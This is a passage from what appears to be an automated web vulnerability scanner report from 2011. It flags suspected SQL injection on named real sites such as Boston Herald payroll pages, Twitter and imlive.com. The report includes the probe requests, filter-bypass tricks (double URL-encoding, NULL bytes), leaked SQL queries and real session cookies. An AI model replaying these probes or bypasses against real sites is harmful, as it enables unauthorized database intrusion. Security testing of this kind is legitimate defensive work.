HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sat, 29 Jan 2011 01:55:04 GMT X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 1245
The team parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the team parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /aspdata/clients/herald/nflgame.aspx?team=077' HTTP/1.1 Host: scores.heraldinteractive.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sat, 29 Jan 2011 01:55:08 GMT X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8709
<html> <head> <title>Unclosed quotation mark before the character string '077''.<br>Line 1: Incorrect syntax near '077''.</title> <style> body {font-family:"Verdana";f ...[SNIP]...
Request 2
GET /aspdata/clients/herald/nflgame.aspx?team=077'' HTTP/1.1 Host: scores.heraldinteractive.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sat, 29 Jan 2011 01:55:09 GMT X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 1814
The team parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the team parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /aspdata/clients/herald/nhlgame.aspx?team=121' HTTP/1.1 Host: scores.heraldinteractive.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sat, 29 Jan 2011 01:55:17 GMT X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8732
<html> <head> <title>Unclosed quotation mark before the character string '121',1'.<br>Line 1: Incorrect syntax near '121',1'.</title> <style> body {font-family:"Verdan ...[SNIP]...
Request 2
GET /aspdata/clients/herald/nhlgame.aspx?team=121'' HTTP/1.1 Host: scores.heraldinteractive.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sat, 29 Jan 2011 01:55:19 GMT X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 1659
The au cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the au cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
1.26. http://tap.rubiconproject.com/oz/sensor [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://tap.rubiconproject.com
Path:
/oz/sensor
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 19372086%20or%201%3d1--%20 and 19372086%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The pc parameter appears to be vulnerable to SQL injection attacks. The payloads 20312360'%20or%201%3d1--%20 and 20312360'%20or%201%3d2--%20 were each submitted in the pc parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /waccess%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: tr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Server Error Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: vsrv32 Date: Fri, 28 Jan 2011 14:25:47 GMT Connection: close Content-Length: 63 Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/
<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>
Request 2
GET /waccess%2527%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: tr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:25:48 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: itr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDSQRTRBSD=FAKPGKMALJJINONJKHHPMGGB; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:25:47 GMT Connection: close Content-Length: 8333 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The gotopage parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the gotopage parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the gotopage request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/%2527 HTTP/1.1 Host: tr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1 (redirected)
HTTP/1.1 500 Server Error Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: vsrv32 Date: Fri, 28 Jan 2011 14:31:40 GMT Connection: close Content-Length: 63 Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/
<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>
Request 2
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/%2527%2527 HTTP/1.1 Host: tr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2 (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:31:40 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: itr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDSQRTRBSD=ABKPGKMAHOCFOJMDCOENFMKF; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:31:40 GMT Connection: close Content-Length: 8250 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET / HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789; Referer: http://www.google.com/search?hl=en&q=%00'
Response 1
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:32:14 GMT Server: hi Status: 200 OK X-Transaction: 1296225134-78066-61608 ETag: "d607d45a9b9b35bf9e842e32301673c1" Last-Modified: Fri, 28 Jan 2011 14:32:14 GMT X-Runtime: 0.00992 Content-Type: text/html; charset=utf-8 Content-Length: 44338 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The original_referer cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the original_referer cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /?status=@ HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa'; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response 1
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 17:06:59 GMT Server: hi Status: 200 OK X-Transaction: 1296234419-42681-53710 ETag: "f792bef31a7a2a529a063813c45d5cab" Last-Modified: Fri, 28 Jan 2011 17:06:59 GMT X-Runtime: 0.05064 Content-Type: text/html; charset=utf-8 Content-Length: 45230 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http-equiv="X-UA-Compatible" content="IE=8"> <meta http-equiv="Content-Type" content="text/html; ch ...[SNIP]... <div class="hc-tweet-text">says when you give your permission to succeed, you can deny that you gave yourself that permission later when you fail.</div> ...[SNIP]...
Request 2
GET /?status=@ HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa''; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response 2
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 17:07:00 GMT Server: hi Status: 200 OK X-Transaction: 1296234420-50746-44456 ETag: "8e7d3220e37789a7d94eb127863bf8c4" Last-Modified: Fri, 28 Jan 2011 17:07:00 GMT X-Runtime: 0.04397 Content-Type: text/html; charset=utf-8 Content-Length: 45014 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
1.32. http://www.bostonherald.com/projects/payroll/cambridge/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.bostonherald.com
Path:
/projects/payroll/cambridge/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /projects/payroll/cambridge/?1'=1 HTTP/1.1 Host: www.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:47:52 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Length: 451 Content-Type: text/html; charset=UTF-8 Connection: close
SQL: SELECT a.*,j.full FROM `cambridgeData` a INNER JOIN `cambridgeCats` j ON j.cat_id = department_id WHERE 1=1 ORDER BY ?1'=1 LIMIT 0,20
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?1'=1 LIMIT 0,20' at line 1<br> ...[SNIP]...
1.33. http://www.bostonherald.com/projects/payroll/mass_pike/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.bostonherald.com
Path:
/projects/payroll/mass_pike/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /projects/payroll/mass_pike/?1'=1 HTTP/1.1 Host: www.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:29:23 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Length: 319 Content-Type: text/html; charset=UTF-8 Connection: close
SQL: SELECT * FROM `massPikePayroll` WHERE 1=1 ORDER BY ?1'=1 LIMIT 0,20
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?1'=1 LIMIT 0,20' at line 1<br> ...[SNIP]...
1.34. http://www.bostonherald.com/projects/payroll/quasi_state/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.bostonherald.com
Path:
/projects/payroll/quasi_state/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /projects/payroll/quasi_state/?1'=1 HTTP/1.1 Host: www.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:39:48 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Length: 492 Content-Type: text/html; charset=UTF-8 Connection: close
SQL: SELECT a.*, b.agency FROM `quasi_state_data` a INNER JOIN `quasi_state_agencies` b ON a.quasi_state_agency_id = b.id WHERE 1=1 ORDER BY ?1\'=1 LIMIT 0,20
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?1\'=1 LIMIT 0,20' at line 1<br> ...[SNIP]...
1.35. http://www.bostonherald.com/projects/payroll/quincy/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.bostonherald.com
Path:
/projects/payroll/quincy/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /projects/payroll/quincy/?1'=1 HTTP/1.1 Host: www.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:36:30 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Length: 317 Content-Type: text/html; charset=UTF-8 Connection: close
SQL: SELECT a.* FROM `quincyData` a WHERE 1=1 ORDER BY ?1'=1 LIMIT 0,20
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?1'=1 LIMIT 0,20' at line 1<br> ...[SNIP]...
1.36. http://www.bostonherald.com/projects/payroll/suffolk/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.bostonherald.com
Path:
/projects/payroll/suffolk/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
